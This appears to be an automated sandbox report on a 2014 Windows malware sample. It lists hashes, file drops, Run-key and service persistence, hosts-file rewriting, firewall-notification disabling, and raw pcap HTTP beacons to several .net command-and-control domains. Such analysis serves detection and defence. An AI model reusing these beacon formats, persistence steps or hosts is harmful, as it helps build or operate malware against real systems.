Analysis Date: 2014-09-06 03:31:42
MD5: fa4ca6ec63178e93761628900d1ab0c7
SHA1: fddcb15f355672ca8105d3f1312ee818f4629fd7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: f90ff339b9ece9daa70e5b3bc8778398 sha1: 767daf1042b762a803c8143b6fc081e72cc3b1ad size: 727040
Section: .rdata md5: 6a72457cf10b62dbdd4a507b73ea46b9 sha1: 78f4bd5b94c134e77c9d3a55a045cc00bc9d26a8 size: 32256
Section: .data md5: b6b0a3f5a1386032d0953da786525c26 sha1: 888ccb2ae968b545a171e1f9e910c82b0eb5bbac size: 123392
Timestamp: 2014-02-05 01:07:27
Packer: Microsoft Visual C++ ?.?
PEhash: c6a02712edb941bf5ec6a4da2ff03691e88227c4
IMPhash: 487e4e2196cace988b9eeb3eb3535805

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system32\jneuadmf\tst
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Defender List Management Files Authentication ➝ C:\WINDOWS\system32\vpgrqnaotg.exe
Creates File: C:\WINDOWS\system32\jneuadmf\lck
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\system32\jneuadmf\tst
Creates File: C:\WINDOWS\system32\vpgrqnaotg.exe
Creates File: C:\WINDOWS\system32\jneuadmf\etc
Deletes File: C:\WINDOWS\system32\\drivers\etc\hosts
Creates Process: C:\WINDOWS\system32\vpgrqnaotg.exe
Creates Service: Color PnP-X Computer Client Window - C:\WINDOWS\system32\vpgrqnaotg.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1120

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1104

Process
↳ C:\WINDOWS\system32\vpgrqnaotg.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1
Creates File: C:\WINDOWS\system32\jneuadmf\tst
Creates File: C:\WINDOWS\system32\jneuadmf\run
Creates File: C:\WINDOWS\system32\hxfockhu.exe
Creates File: C:\WINDOWS\system32\jneuadmf\lck
Creates File: pipe\net\NtControlPipe10
Creates File: C:\WINDOWS\system32\jneuadmf\rng
Creates File: C:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\jneuadmf\cfg
Creates Process: WATCHDOGPROC "c:\windows\system32\vpgrqnaotg.exe"
Creates Process: C:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe -r 29165 tcp

Process
↳ C:\WINDOWS\system32\vpgrqnaotg.exe

Creates File: C:\WINDOWS\system32\jneuadmf\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\vpgrqnaotg.exe"

Creates File: C:\WINDOWS\system32\jneuadmf\tst

Process
↳ C:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe -r 29165 tcp

Creates File: \Device\Afd\Endpoint
Winsock DNS: 239.255.255.250

Network Details:


Raw Pcap

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206361 7365686f 7573652e 6e65740d   : casehouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206865 6164686f 7573652e 6e65740d   : headhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b68 6f757365 2e6e6574   : quickhouse.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b67 6966742e 6e65740d   : quickgift.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207369 636b686f 7573652e 6e65740d   : sickhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......


Strings